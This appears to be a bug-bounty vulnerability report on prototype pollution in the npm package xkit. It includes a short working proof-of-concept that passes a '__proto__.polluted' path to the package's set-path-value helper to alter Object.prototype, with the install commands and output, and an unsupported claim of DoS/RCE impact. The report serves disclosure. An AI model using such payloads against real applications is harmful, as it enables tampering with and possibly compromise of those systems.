Prototype Pollution in ssnau/xkit


Reported on

Apr 17th 2021

✍️ Description

Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain.

🕵️‍♂️ Proof of Concept

  1. Create the following PoC file:
// poc.js
const set = require('xkit/util/set-path-value')

console.log('Before:', {}.polluted)
set({}, '__proto__.polluted', true)
console.log('After:', {}.polluted)
  1. Execute the following commands in terminal:
npm i xkit # Install vulerable package
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : true

💥 Impact

An attacker is able to DoS/RCE

to join this conversation